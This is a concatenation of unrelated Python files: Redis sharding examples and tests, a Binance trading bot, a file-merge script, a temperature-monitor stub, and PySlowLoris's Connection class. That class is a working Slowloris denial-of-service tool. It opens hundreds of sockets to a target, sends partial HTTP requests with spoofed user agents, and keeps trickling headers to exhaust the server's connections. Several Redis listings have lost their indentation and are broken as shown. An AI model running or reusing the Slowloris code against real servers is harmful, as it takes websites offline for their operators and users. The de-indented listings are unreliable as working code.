    # Return the connection object that the user requested.
    return REDIS_CONNECTIONS.get(key)
# <end id="get-connection"/>
# Listing 10-2
# <start id="get-sharded-connection"/>
def get_sharded_connection(component, key, shard_count, wait=1):
    # Compute the shard ID of the form "<component>:<shard number>".
    shard = shard_key(component, 'x'+str(key), shard_count, 2)
    # Return the connection.
    return get_redis_connection(shard, wait)
# <end id="get-sharded-connection"/>
# <start id="no-decorator-example"/>
def log_recent(conn, app, message):
'the old log_recent() code'
log_recent = redis_connection('logs')(log_recent)  # Wrapping the function manually like this has the same effect as using the decorator syntax.
# <end id="no-decorator-example"/>
# Listing 10-3
# <start id="shard-aware-decorator"/>
# The decorator takes the component name and the expected number of shards as arguments.
def sharded_connection(component, shard_count, wait=1):
    # Create a wrapper that will decorate the passed-in function.
    def wrapper(function):
        # Copy some useful metadata from the original function to the configuration handler.
        @functools.wraps(function)
        # Create the function that computes the shard ID for keys and sets up the connection manager.
        def call(key, *args, **kwargs):
            # Fetch the sharded connection.
            conn = get_sharded_connection(
                component, key, shard_count, wait)
            # Actually call the wrapped function, passing the sharded connection and the other arguments.
            return function(conn, key, *args, **kwargs)
        # Return the wrapped function.
        return call
    # Return a function that can wrap functions that need a sharded connection.
    return wrapper
# <end id="shard-aware-decorator"/>
# Listing 10-4
# <start id="sharded-count-unique"/>
# Shard count_visit() across 16 machines, and automatically shard its
# results across multiple database keys on each of those machines.
@sharded_connection('unique', 16)
def count_visit(conn, session_id):
    today = date.today()
    key = 'unique:%s'%today.isoformat()
    # The modified call to get_expected().
    conn2, expected = get_expected(key, today)
    id = int(session_id.replace('-', '')[:15], 16)
    if shard_sadd(conn, key, id, expected, SHARD_SIZE):
        # Use the nonsharded connection returned by get_expected()
        # to increment the unique-visitor counter.
        conn2.incr(key)
# Use a nonsharded connection for get_expected().
@redis_connection('unique')
def get_expected(conn, key, today):
    'all of the same function body as before, except the last line'
    # Return the nonsharded connection so that count_visit() can
    # increment the unique-visitor counter when necessary.
    return conn, EXPECTED[key]
# <end id="sharded-count-unique"/>
# Listing 10-5
# <start id="search-with-values"/>
# This function takes exactly the same arguments as search_and_sort().
def search_get_values(conn, query, id=None, ttl=300, sort="-updated",
                      start=0, num=20):
    # First get the results of the search and sort.
    count, docids, id = search_and_sort(
        conn, query, id, ttl, sort, 0, start+num)
    key = "kb:doc:%s"
    sort = sort.lstrip('-')
    pipe = conn.pipeline(False)
    # Fetch the data that the results were sorted by.
    for docid in docids:
        pipe.hget(key%docid, sort)
    sort_column = pipe.execute()
    # Pair up the document IDs with the data they were sorted by.
    data_pairs = zip(docids, sort_column)
    # Return the number of matching documents, the sorted result pairs, and the cache ID of the results.
    return count, data_pairs, id
# <end id="search-with-values"/>
# Listing 10-6
# <start id="search-on-shards"/>
# To discover which servers it should talk to, the program assumes that the
# information about all shard servers is stored in a standard configuration
# location.
def get_shard_results(component, shards, query, ids=None, ttl=300,
                      sort="-updated", start=0, num=20, wait=1):
    # Prepare structures to hold the fetched data.
    count = 0
    data = []
    # Use cached search results if they are available;
    # otherwise, re-run the query.
    ids = ids or shards * [None]
    for shard in xrange(shards):
        # Get or create a connection to the given shard.
        conn = get_redis_connection('%s:%s'%(component, shard), wait)
        # Fetch the search results and their sort data.
        c, d, i = search_get_values(
            conn, query, ids[shard], ttl, sort, start, num)
        # Merge this shard's results with those of the other shards.
        count += c
        data.extend(d)
        ids[shard] = i
    # Return the raw results from all of the shards to the caller.
    return count, data, ids
# <end id="search-on-shards"/>
def get_values_thread(component, shard, wait, rqueue, *args, **kwargs):
conn = get_redis_connection('%s:%s'%(component, shard), wait)
count, results, id = search_get_values(conn, *args, **kwargs)
rqueue.put((shard, count, results, id))
def get_shard_results_thread(component, shards, query, ids=None, ttl=300,
sort="-updated", start=0, num=20, wait=1, timeout=.5):
ids = ids or shards * [None]
rqueue = Queue()
for shard in xrange(shards):
t = threading.Thread(target=get_values_thread, args=(
component, shard, wait, rqueue, query, ids[shard],
ttl, sort, start, num))
t.setDaemon(1)
t.start()
received = 0
count = 0
data = []
deadline = time.time() + timeout
while received < shards and time.time() < deadline:
try:
sh, c, r, i = rqueue.get(timeout=max(deadline-time.time(), .001))
except Empty:
break
else:
count += c
data.extend(r)
ids[sh] = i
return count, data, ids
# Listing 10-7
# <start id="merge-sharded-results"/>
def to_numeric_key(data):
    try:
        # Decimal is used here because it handles both integers and floats
        # sensibly, and falls back to a default value of 0 when the value
        # is missing or non-numeric.
        return Decimal(data[1] or '0')
    except:
        return Decimal('0')
def to_string_key(data):
    # Always return a string, even if the value is missing.
    return data[1] or ''
# This function needs to take all of the sharding and search arguments;
# most of them are passed on to lower-level functions, and this function
# itself only uses the sort argument and the search offsets.
def search_shards(component, shards, query, ids=None, ttl=300,
                  sort="-updated", start=0, num=20, wait=1):
    # Fetch the unsorted results from the shards.
    count, data, ids = get_shard_results(
        component, shards, query, ids, ttl, sort, start, num, wait)
    # Prepare the arguments needed for sorting.
    reversed = sort.startswith('-')
    sort = sort.strip('-')
    key = to_numeric_key
    if sort not in ('updated', 'id', 'created'):
        key = to_string_key
    # Sort the results according to the sort argument.
    data.sort(key=key, reverse=reversed)
    results = []
    # Fetch only the page of results that the user requested.
    for docid, score in data[start:start+num]:
        results.append(docid)
    # Return the selected results, including the sequence of cache IDs from each shard.
    return count, results, ids
# <end id="merge-sharded-results"/>
# Listing 10-8
# <start id="zset-search-with-values"/>
# This function takes all of the arguments that search_and_zsort() takes.
def search_get_zset_values(conn, query, id=None, ttl=300, update=1,
                    vote=0, start=0, num=20, desc=True):
    # Call the underlying search_and_zsort() function to get the cache ID
    # of the results and the number of documents they contain.
    count, r, id = search_and_zsort(
        conn, query, id, ttl, update, vote, 0, 1, desc)
    # Fetch the requested results along with their scores.
    if desc:
        data = conn.zrevrange(id, 0, start + num - 1, withscores=True)
    else:
        data = conn.zrange(id, 0, start + num - 1, withscores=True)
    # Return the result count, the results with their scores, and the cache ID.
    return count, data, id
# <end id="zset-search-with-values"/>
# Listing 10-9
# <start id="search-shards-zset"/>
# The function takes all of the sharding arguments along with all of the search arguments.
def search_shards_zset(component, shards, query, ids=None, ttl=300,
                    update=1, vote=0, start=0, num=20, desc=True, wait=1):
    # Prepare structures to hold the fetched data.
    count = 0
    data = []
    # Use cached results if they are available;
    # otherwise, start a new search.
    ids = ids or shards * [None]
    for shard in xrange(shards):
        # Get or create a connection to each shard.
        conn = get_redis_connection('%s:%s'%(component, shard), wait)
        # Search on the shard and fetch the scores of the results.
        c, d, i = search_get_zset_values(conn, query, ids[shard],
            ttl, update, vote, start, num, desc)
        # Merge the results from each shard.
        count += c
        data.extend(d)
        ids[shard] = i
    # A simple sort helper that returns only the score.
    def key(result):
        return result[1]
    # Sort all of the results.
    data.sort(key=key, reverse=desc)
    results = []
    # Extract the document IDs, discarding their scores.
    for docid, score in data[start:start+num]:
        results.append(docid)
    # Return the results to the caller.
    return count, results, ids
# <end id="search-shards-zset"/>
# Listing 10-11
# <start id="sharded-api-base"/>
class KeyShardedConnection(object):
    # The object is initialized with the component name and the number of shards.
    def __init__(self, component, shards):
        self.component = component
        self.shards = shards
    # This method is called when an item is fetched from the object;
    # the argument passed in is the key being requested.
    def __getitem__(self, key):
        # Get the sharded connection based on the passed-in key and the
        # previously known component name and shard count.
        return get_sharded_connection(
            self.component, key, self.shards)
# <end id="sharded-api-base"/>
# Listing 10-10
# <start id="sharded-api-example"/>
# Create a connection object that knows how to shard data for a component with the given number of shards.
sharded_timelines = KeyShardedConnection('timelines', 8)
def follow_user(conn, uid, other_uid):
fkey1 = 'following:%s'%uid
fkey2 = 'followers:%s'%other_uid
if conn.zscore(fkey1, other_uid):
print "already followed", uid, other_uid
return None
now = time.time()
pipeline = conn.pipeline(True)
pipeline.zadd(fkey1, other_uid, now)
pipeline.zadd(fkey2, uid, now)
pipeline.zcard(fkey1)
pipeline.zcard(fkey2)
following, followers = pipeline.execute()[-2:]
pipeline.hset('user:%s'%uid, 'following', following)
pipeline.hset('user:%s'%other_uid, 'followers', followers)
pipeline.execute()
pkey = 'profile:%s'%other_uid
    # Fetch the most recent status messages from the profile timeline of the newly followed user.
status_and_score = sharded_timelines[pkey].zrevrange(
pkey, 0, HOME_TIMELINE_SIZE-1, withscores=True)
if status_and_score:
hkey = 'home:%s'%uid
        # Get a connection for the sharded home timeline key, then get a pipeline from it.
pipe = sharded_timelines[hkey].pipeline(True)
        # Add the status messages to the sharded home timeline ZSET,
        # then trim the ZSET after the additions are done.
pipe.zadd(hkey, **dict(status_and_score))
pipe.zremrangebyrank(hkey, 0, -HOME_TIMELINE_SIZE-1)
        # Execute the transaction.
pipe.execute()
return True
# <end id="sharded-api-example"/>
# Listing 10-13
# <start id="key-data-sharded-api"/>
class KeyDataShardedConnection(object):
    # The object is initialized with the component name and the number of shards.
    def __init__(self, component, shards):
        self.component = component
        self.shards = shards
    # This method is called when a pair of IDs is used as the key for a
    # dictionary-style lookup.
    def __getitem__(self, ids):
        # Unpack the two IDs and make sure that they are both integers.
        id1, id2 = map(int, ids)
        # If the second ID is smaller than the first, swap them so that
        # the first ID is always less than or equal to the second.
        if id2 < id1:
            id1, id2 = id2, id1
        # Construct a key from the two IDs.
        key = "%s:%s"%(id1, id2)
        # Get the sharded connection based on the constructed key and the
        # previously known component name and shard count.
        return get_sharded_connection(
            self.component, key, self.shards)
# <end id="key-data-sharded-api"/>
_follow_user = follow_user
# Listing 10-12
# <start id="sharded-api-example2"/>
# Create connection objects that know how to shard data for components
# with the given numbers of shards.
sharded_timelines = KeyShardedConnection('timelines', 8)
sharded_followers = KeyDataShardedConnection('followers', 16)
def follow_user(conn, uid, other_uid):
fkey1 = 'following:%s'%uid
fkey2 = 'followers:%s'%other_uid
    # Get the connection object for the uid/other_uid pair.
sconn = sharded_followers[uid, other_uid]
    # Check whether other_uid is already being followed.
if sconn.zscore(fkey1, other_uid):
return None
now = time.time()
spipe = sconn.pipeline(True)
    # Add the follower and following entries to the ZSETs.
spipe.zadd(fkey1, other_uid, now)
spipe.zadd(fkey2, uid, now)
following, followers = spipe.execute()
pipeline = conn.pipeline(True)
    # Update the following and followers counts for both users.
pipeline.hincrby('user:%s'%uid, 'following', int(following))
pipeline.hincrby('user:%s'%other_uid, 'followers', int(followers))
pipeline.execute()
pkey = 'profile:%s'%other_uid
status_and_score = sharded_timelines[pkey].zrevrange(
pkey, 0, HOME_TIMELINE_SIZE-1, withscores=True)
if status_and_score:
hkey = 'home:%s'%uid
pipe = sharded_timelines[hkey].pipeline(True)
pipe.zadd(hkey, **dict(status_and_score))
pipe.zremrangebyrank(hkey, 0, -HOME_TIMELINE_SIZE-1)
pipe.execute()
return True
# <end id="sharded-api-example2"/>
# Listing 10-14
# <start id="sharded-zrangebyscore"/>
# The function takes the component name and shard count, plus the arguments
# that behave correctly in a sharded context.
def sharded_zrangebyscore(component, shards, key, min, max, num):
    data = []
    for shard in xrange(shards):
        # Get the sharded connection for the current shard.
        conn = get_redis_connection("%s:%s"%(component, shard))
        # Fetch the data from the Redis shard.
        data.extend(conn.zrangebyscore(
            key, min, max, start=0, num=num, withscores=True))
    # Sort the data first by score, then by member.
    def key(pair):
        return pair[1], pair[0]
    data.sort(key=key)
    # Return only the number of items requested.
    return data[:num]
# <end id="sharded-zrangebyscore"/>
# Listing 10-15
# <start id="sharded-syndicate-posts"/>
def syndicate_status(uid, post, start=0, on_lists=False):
root = 'followers'
key = 'followers:%s'%uid
base = 'home:%s'
if on_lists:
root = 'list:out'
key = 'list:out:%s'%uid
base = 'list:statuses:%s'
    # Fetch the next group of followers with the sharded ZRANGEBYSCORE call.
followers = sharded_zrangebyscore(root,
sharded_followers.shards, key, start, 'inf', POSTS_PER_PASS)
    # Group the timelines by the shard they are stored on, and put the
    # grouped keys into a prepared structure.
to_send = defaultdict(list)
for follower, start in followers:
        # Construct the key for the follower's home timeline.
timeline = base % follower
        # Find the shard responsible for storing this timeline.
shard = shard_key('timelines',
timeline, sharded_timelines.shards, 2)
        # Append the timeline key to the other timelines on the same shard.
to_send[shard].append(timeline)
for timelines in to_send.itervalues():
        # Get a connection to the server that stores this group of timelines,
        # then create a pipeline on it.
pipe = sharded_timelines[timelines[0]].pipeline(False)
for timeline in timelines:
            # Add the newly posted message to each timeline, and remove
            # messages that are now too old.
pipe.zadd(timeline, **post)
pipe.zremrangebyrank(
timeline, 0, -HOME_TIMELINE_SIZE-1)
pipe.execute()
conn = redis.Redis()
if len(followers) >= POSTS_PER_PASS:
execute_later(conn, 'default', 'syndicate_status',
[uid, post, start, on_lists])
elif not on_lists:
execute_later(conn, 'default', 'syndicate_status',
[uid, post, 0, True])
# <end id="sharded-syndicate-posts"/>
def _fake_shards_for(conn, component, count, actual):
assert actual <= 4
for i in xrange(count):
m = i % actual
conn.set('config:redis:%s:%i'%(component, i), json.dumps({'db':14 - m}))
class TestCh10(unittest.TestCase):
def _flush(self):
self.conn.flushdb()
redis.Redis(db=14).flushdb()
redis.Redis(db=13).flushdb()
redis.Redis(db=12).flushdb()
redis.Redis(db=11).flushdb()
def setUp(self):
self.conn = redis.Redis(db=15)
self._flush()
global config_connection
config_connection = self.conn
self.conn.set('config:redis:test', json.dumps({'db':15}))
def tearDown(self):
self._flush()
def test_get_sharded_connections(self):
_fake_shards_for(self.conn, 'shard', 2, 2)
for i in xrange(10):
get_sharded_connection('shard', i, 2).sadd('foo', i)
s0 = redis.Redis(db=14).scard('foo')
s1 = redis.Redis(db=13).scard('foo')
self.assertTrue(s0 < 10)
self.assertTrue(s1 < 10)
self.assertEquals(s0 + s1, 10)
def test_count_visit(self):
shards = {'db':13}, {'db':14}
self.conn.set('config:redis:unique', json.dumps({'db':15}))
for i in xrange(16):
self.conn.set('config:redis:unique:%s'%i, json.dumps(shards[i&1]))
for i in xrange(100):
count_visit(str(uuid.uuid4()))
base = 'unique:%s'%date.today().isoformat()
total = 0
for c in shards:
conn = redis.Redis(**c)
keys = conn.keys(base + ':*')
for k in keys:
cnt = conn.scard(k)
total += cnt
self.assertTrue(cnt < k)
self.assertEquals(total, 100)
self.assertEquals(self.conn.get(base), '100')
def test_sharded_search(self):
_fake_shards_for(self.conn, 'search', 2, 2)
docs = 'hello world how are you doing'.split(), 'this world is doing fine'.split()
for i in xrange(50):
c = get_sharded_connection('search', i, 2)
index_document(c, i, docs[i&1], {'updated':time.time() + i, 'id':i, 'created':time.time() + i})
r = search_and_sort(c, docs[i&1], sort='-id')
self.assertEquals(r[1][0], str(i))
total = 0
for shard in (0,1):
count = search_get_values(get_redis_connection('search:%s'%shard),['this', 'world'], num=50)[0]
total += count
self.assertTrue(count < 50)
self.assertTrue(count > 0)
self.assertEquals(total, 25)
count, r, id = get_shard_results('search', 2, ['world', 'doing'], num=50)
self.assertEquals(count, 50)
self.assertEquals(count, len(r))
self.assertEquals(get_shard_results('search', 2, ['this', 'doing'], num=50)[0], 25)
count, r, id = get_shard_results_thread('search', 2, ['this', 'doing'], num=50)
self.assertEquals(count, 25)
self.assertEquals(count, len(r))
r.sort(key=lambda x:x[1], reverse=True)
r = list(zip(*r)[0])
count, r2, id = search_shards('search', 2, ['this', 'doing'])
self.assertEquals(count, 25)
self.assertEquals(len(r2), 20)
self.assertEquals(r2, r[:20])
def test_sharded_follow_user(self):
_fake_shards_for(self.conn, 'timelines', 8, 4)
sharded_timelines['profile:1'].zadd('profile:1', 1, time.time())
for u2 in xrange(2, 11):
sharded_timelines['profile:%i'%u2].zadd('profile:%i'%u2, u2, time.time() + u2)
_follow_user(self.conn, 1, u2)
_follow_user(self.conn, u2, 1)
self.assertEquals(self.conn.zcard('followers:1'), 9)
self.assertEquals(self.conn.zcard('following:1'), 9)
self.assertEquals(sharded_timelines['home:1'].zcard('home:1'), 9)
for db in xrange(14, 10, -1):
self.assertTrue(len(redis.Redis(db=db).keys()) > 0)
for u2 in xrange(2, 11):
self.assertEquals(self.conn.zcard('followers:%i'%u2), 1)
self.assertEquals(self.conn.zcard('following:%i'%u2), 1)
self.assertEquals(sharded_timelines['home:%i'%u2].zcard('home:%i'%u2), 1)
def test_sharded_follow_user_and_syndicate_status(self):
_fake_shards_for(self.conn, 'timelines', 8, 4)
_fake_shards_for(self.conn, 'followers', 4, 4)
sharded_followers.shards = 4
sharded_timelines['profile:1'].zadd('profile:1', 1, time.time())
for u2 in xrange(2, 11):
sharded_timelines['profile:%i'%u2].zadd('profile:%i'%u2, u2, time.time() + u2)
follow_user(self.conn, 1, u2)
follow_user(self.conn, u2, 1)
allkeys = defaultdict(int)
for db in xrange(14, 10, -1):
c = redis.Redis(db=db)
for k in c.keys():
allkeys[k] += c.zcard(k)
for k, v in allkeys.iteritems():
part, _, owner = k.partition(':')
if part in ('following', 'followers', 'home'):
self.assertEquals(v, 9 if owner == '1' else 1)
elif part == 'profile':
self.assertEquals(v, 1)
self.assertEquals(len(sharded_zrangebyscore('followers', 4, 'followers:1', '0', 'inf', 100)), 9)
syndicate_status(1, {'11':time.time()})
self.assertEquals(len(sharded_zrangebyscore('timelines', 4, 'home:2', '0', 'inf', 100)), 2)
if __name__ == '__main__':
unittest.main()
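# Note (added, not part of the original listing): TestCh10 assumes a local
# Redis server whose databases 11 through 15 are disposable; setUp() and
# tearDown() flush all of them between tests.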
|
connection.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
MIT License
Copyright (c) 2017 Maxim Krivich
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
"""
import time
import socket
import random
import threading
from Queue import Queue
from PySlowLoris import logger
from fake_useragent import UserAgent, FakeUserAgentError
class Connection(threading.Thread):
"""
    This class implements a SlowLoris connection.
    It extends Thread, which means it must be launched like a thread. (Thank you, captain Obvious!)
"""
SLEEP_TIME = 0.01
COUNT_OF_PRODUCERS = 3
def __init__(self, target, socket_count=300, headers={
'User-Agent': None, # UserAgent()
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
'Accept-Encoding': 'gzip, deflate',
'Accept-Language': 'ru,en-us;q=0.7,en;q=0.3',
'Accept-Charset': 'windows-1251,utf-8;q=0.7,*;q=0.7',
'Connection': 'keep-alive'
}):
"""
        :param target: link to the web server [TargetInfo]
        :param socket_count: maximum number of sockets to create (default 300)
        :param headers: HTTP headers to put in each request
"""
super(Connection, self).__init__()
# self.lock = lock
self.target = target
self.headers = headers
try:
self.fake_ua = UserAgent()
except FakeUserAgentError as fe:
logger.error(fe)
# Counters
self.socket_count = socket_count
self.__cnt_sent_requests = 0
self.__cnt_died_sockets = 0
self.__cnt_alive_socket = 0
self.__sockets = []
self.is_stop = False
def isStopped(self):
return self.is_stop
def stop(self):
self.is_stop = True
def __del__(self):
for soc in self.__sockets:
try:
soc.close()
except socket.error:
continue
except Exception as ex:
logger.exception(ex)
# stop all daemons
def __create_sockets(self, lock):
"""
:param lock: mutex for socket list
"""
while not self.isStopped():
if self.__cnt_alive_socket < self.socket_count:
try:
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.settimeout(5)
sock.connect((unicode(self.target['ip']), self.target['port']))
sock.send("GET /? {} HTTP/1.1\r\n".format(random.randint(0, 9999999)))
for k in self.headers.keys():
if k == "User-Agent":
self.headers[k] = str(self.fake_ua.random)
sock.send("{key}:{value}\r\n".format(key=k, value=self.headers[k]))
lock.acquire()
self.__sockets.append(sock)
self.__cnt_alive_socket += 1
lock.release()
except socket.error as err:
sock.close()
logger.error(err)
except Exception as ex:
logger.exception(ex)
def get_counter(self):
return {"alive": self.__cnt_alive_socket, "died": self.__cnt_died_sockets,
"requests": self.__cnt_sent_requests}
def __send_requests(self, queue, lock):
"""
:param queue: queue with sockets
:param lock: mutex for main counters
"""
while not self.isStopped():
sock = queue.get()
try:
sock.send("X-a: {} \r\n".format(random.randint(0, 9999999)))
lock.acquire()
self.__cnt_sent_requests += 1
lock.release()
time.sleep(self.SLEEP_TIME * random.random())
except socket.error:
lock.acquire()
self.__cnt_alive_socket -= 1
self.__cnt_died_sockets += 1
lock.release()
self.__sockets.remove(sock)
sock.close()
# logger.error(err)
except Exception as ex:
logger.exception(ex)
finally:
queue.task_done()
def run(self):
create_lock = threading.Lock()
counters_lock = threading.Lock()
# run creators
for _ in range(self.COUNT_OF_PRODUCERS):
t = threading.Thread(target=self.__create_sockets, args=(create_lock,))
t.daemon = True
t.start()
# waiting for sockets
while self.__cnt_alive_socket < self.socket_count:
time.sleep(1)
queue = Queue(self.socket_count + 10) # +10 for fun
# run senders
for _ in range(self.COUNT_OF_PRODUCERS):
t = threading.Thread(target=self.__send_requests, args=(queue, counters_lock,))
t.daemon = True
t.start()
while not self.isStopped():
if self.__cnt_alive_socket < self.socket_count:
time.sleep(1)
random.shuffle(self.__sockets)
for sock in self.__sockets:
queue.put(sock)
queue.join()
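# Hypothetical usage sketch (not part of the original module): as the class
# docstring notes, Connection must be started like a thread.  The shape of the
# target dict ('ip' and 'port' keys) is inferred from __create_sockets above.
#
#   target = {'ip': '127.0.0.1', 'port': 80}
#   conn = Connection(target, socket_count=150)
#   conn.daemon = True
#   conn.start()
#   time.sleep(60)
#   conn.stop()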
|
Binance_Detect_Moonings.py
|
"""
Disclaimer
All investment strategies and investments involve risk of loss.
Nothing contained in this program, scripts, code or repository should be
construed as investment advice. Any reference to an investment's past or
potential performance is not, and should not be construed as, a recommendation
or as a guarantee of any specific outcome or profit.
By using this program you accept all liabilities,
and that no claims can be made against the developers,
or others connected with the program.
"""
# use for environment variables
from genericpath import exists
import os
#from modules.rsi_signalmod_nigec import FULL_LOG
# use if needed to pass args to external modules
import sys
# used to create threads & dynamic loading of modules
import threading
import importlib
# used for directory handling
import glob
#gogo MOD telegram needs import request
import requests
# Needed for colorful console output. Install with: python3 -m pip install colorama (Mac/Linux) or pip install colorama (PC)
from colorama import init
init()
# needed for the binance API / websockets / Exception handling
from binance.client import Client
from binance.exceptions import BinanceAPIException
from requests.exceptions import ReadTimeout, ConnectionError
# used for dates
from datetime import date, datetime, timedelta
import time
# used to repeatedly execute the code
from itertools import count
# used to store trades and sell assets
import json
# Load helper modules
from helpers.parameters import (
parse_args, load_config
)
# Load creds modules
from helpers.handle_creds import (
load_correct_creds, test_api_key,
load_telegram_creds
)
#import bot extension functions including main function for trading
from bot.settings import *
from bot.dynamics import *
from bot.report import *
from bot.session import *
from bot.tickers_list import *
from bot.grab import *
from bot.trade import *
# print with timestamps
old_out = sys.stdout
class St_ampe_dOut:
"""Stamped stdout."""
nl = True
def write(self, x: str) -> None:
"""Write function overloaded."""
if x == '\n':
old_out.write(x)
self.nl = True
elif self.nl:
old_out.write(f'{txcolors.DIM}[{str(datetime.now().replace(microsecond=0))}]{txcolors.DEFAULT} {x}')
self.nl = False
else:
old_out.write(x)
def flush(self) -> None:
pass
sys.stdout = St_ampe_dOut()
def pause_bot() -> None:
'''Pause the script when external indicators detect a bearish trend in the market'''
global bot_paused, hsp_head, settings_struct
global LIST_AUTOCREATE
# start counting for how long the bot has been paused
start_time = time.perf_counter()
while os.path.isfile("signals/paused.exc"):
if bot_paused == False:
print(f"{txcolors.WARNING}Buying paused due to negative market conditions, stop loss and take profit will continue to work...{txcolors.DEFAULT}")
# sell all bought coins if bot is bot_paused
if STOP_LOSS_ON_PAUSE == True:
session_struct['sell_all_coins'] = True
bot_paused = True
# sell all bought coins if bot is bot_paused
if STOP_LOSS_ON_PAUSE == True:
session_struct['sell_all_coins'] = True
# Sell function needs to work even while paused
coins_sold = sell_coins()
remove_from_portfolio(coins_sold)
get_price(True)
# pausing here
#gogo MOD todo more verbose having all the report things in it!!!!!
report_update()
time.sleep(settings_struct['RECHECK_INTERVAL'])
else:
# stop counting the pause time
stop_time = time.perf_counter()
time_elapsed = timedelta(seconds=int(stop_time-start_time))
# resume the bot and set pause_bot to False
if bot_paused == True:
print(f"{txcolors.WARNING}Resuming buying due to positive market conditions, total sleep time: {time_elapsed}{txcolors.DEFAULT}")
tickers_list()
session_struct['dynamic'] = 'reset'
session_struct['sell_all_coins'] = False
bot_paused = False
return
if __name__ == '__main__':
mymodule = {}
print('Press Ctrl-Q to stop the script')
if not TEST_MODE:
if not args.notimeout: # if notimeout skip this (fast for dev tests)
print('WARNING: test mode is disabled in the configuration, you are using live funds.')
print('WARNING: Waiting 10 seconds before live trading as a security measure!')
time.sleep(10)
signals = glob.glob("signals/*.exs")
for filename in signals:
for line in open(filename):
try:
os.remove(filename)
except:
if DEBUG: print(f'{txcolors.WARNING}Could not remove external signalling file {filename}{txcolors.DEFAULT}')
if os.path.isfile("signals/paused.exc"):
try:
os.remove("signals/paused.exc")
except:
if DEBUG: print(f'{txcolors.WARNING}Could not remove external signalling file {filename}{txcolors.DEFAULT}')
# load signalling modules
try:
if SIGNALLING_MODULES != None and len(SIGNALLING_MODULES) > 0:
for module in SIGNALLING_MODULES:
print(f'Starting {module}')
mymodule[module] = importlib.import_module(module)
t = threading.Thread(target=mymodule[module].do_work, args=())
t.daemon = True
t.start()
time.sleep(2)
else:
print(f'No modules to load {SIGNALLING_MODULES}')
except Exception as e:
print(e)
# get decimal places for each coin as used by Binance
get_symbol_info()
# load historical price for PAIR_WITH
get_historical_price()
# seed initial prices
get_price()
#load previous session parameters
session('load')
#report that bot is started to defined communication channels
report('message', 'Bot initiated')
# start logging to CSV
c = threading.Thread(target=csv_log, args=(60,))
c.daemon = True
c.start()
while True:
ts = time.time()
pause_bot()
#main trading function
trade_crypto()
#recreate tickers list and reload it
reload_tickers()
#use dynamic settings to adjust change in price and take profit based on market support and resistance
dynamic_settings('mrs_settings', TIME_DIFFERENCE, RECHECK_INTERVAL)
#gogos MOD to adjust dynamically stoploss trailingstop loss and take profit based on wins
dynamic_settings(type, TIME_DIFFERENCE, RECHECK_INTERVAL)
#session calculations like unrealised potential etc
session('calc')
#save session data to session_info file
session('save')
#write report to console
report_update()
#sleep for RECHECK_INTERVAL time
ts_sleep = settings_struct['RECHECK_INTERVAL'] - ( time.time() - ts )
if (ts_sleep > 0 ) :
time.sleep(ts_sleep)
|
mergy.py
|
#!/usr/bin/env python3
# Author: Emmanuel Odeke <odeke@ualberta.ca>
# Copy content from src to destination only if it doesn't
# exist in the destination
import os
import sys
import json
import shutil
import hashlib
from threading import Thread
isDir = lambda p: p and os.path.isdir(p)
isPath = lambda p: p and os.path.isfile(p)
def getHashDigest(fPath):
if isPath(fPath):
with open(fPath, 'rb') as f:
digest = hashlib.md5(f.read()).hexdigest()
return digest
def mapDigests(dirPath, hmap):
for root, dirs, paths in os.walk(dirPath):
joinedPaths = (os.path.join(root, path) for path in paths)
for path in joinedPaths:
digest = getHashDigest(path)
hmap.setdefault(digest, []).append(path)
print(path, digest)
def getNonExistant(primary, secondary):
foreignToSecondary = []
for digest in primary:
if digest not in secondary:
headList = primary[digest]
if headList:
foreignToSecondary.append(headList[0])
return foreignToSecondary
def main():
argc = len(sys.argv)
if argc < 3:
sys.stderr.write('Usage: <primary_dir> <secondary_dir>\n')
sys.exit(-1)
pdir, sdir = sys.argv[1:3]
destination = sys.argv[3] if argc > 3 else sdir
if not isDir(pdir):
sys.stderr.write('Primary is not a directory\n')
elif not isDir(sdir):
sys.stderr.write('Secondary is not a directory\n')
else:
pmap = {}
smap = {}
pTh = Thread(target=mapDigests, args=(pdir, pmap))
sTh = Thread(target=mapDigests, args=(sdir, smap))
pTh.start()
sTh.start()
pTh.join()
sTh.join()
handleMerging(pmap, smap, destination)
def handleDirCreation(path):
if not path:
return 400, None
elif os.path.isdir(path):
return 409, path
else:
try:
os.mkdir(path)
except Exception as e:
return 500, e
else:
return 200, path
def handleMerging(pmap, smap, destination):
status, destPath = handleDirCreation(destination)
if not (status == 200 or status == 409):
return destPath # An error
errd = []
accessDenied = []
passCount = 0
foreignToSecondary = getNonExistant(pmap, smap)
for i, path in enumerate(foreignToSecondary):
if not os.access(path, os.R_OK):
accessDenied.append(path)
else:
try:
shutil.copy(path, destPath)
except Exception as e:
errd.append((path, str(e),))
else:
sys.stdout.write("Successful Copy: index %d/%d\r"%(passCount, i))
passCount += 1
if errd:
with open('errdCopy.json', 'w') as f:
f.write(json.dumps(errd))
if accessDenied:
with open('accessDenied.json', 'w') as g:
g.write(json.dumps(accessDenied))
return passCount
if __name__ == '__main__':
main()
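# Example invocation (hypothetical paths):
#   ./mergy.py ~/Pictures/camera ~/Backups/photos ~/Backups/merged
# Files whose MD5 digest appears only under the primary directory are copied
# into the destination, which defaults to the secondary directory when no
# third argument is given.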
|
pitmTemperature.py
|
#!/usr/bin/python
# pitmTemperature - temperature monitoring
import os
import hashlib
import struct
import socket
import syslog
import json
import sys
import threading
import time
import re
from pitmCfg import pitmCfg
class pitmTemperature:
def __init__(self):
self.logging = 2 # 1 = syslog, 2 = stderr
self.cfg = pitmCfg()
self.rxTemp = re.compile("^.*t=(\d+)")
self.probesToMonitor = {}
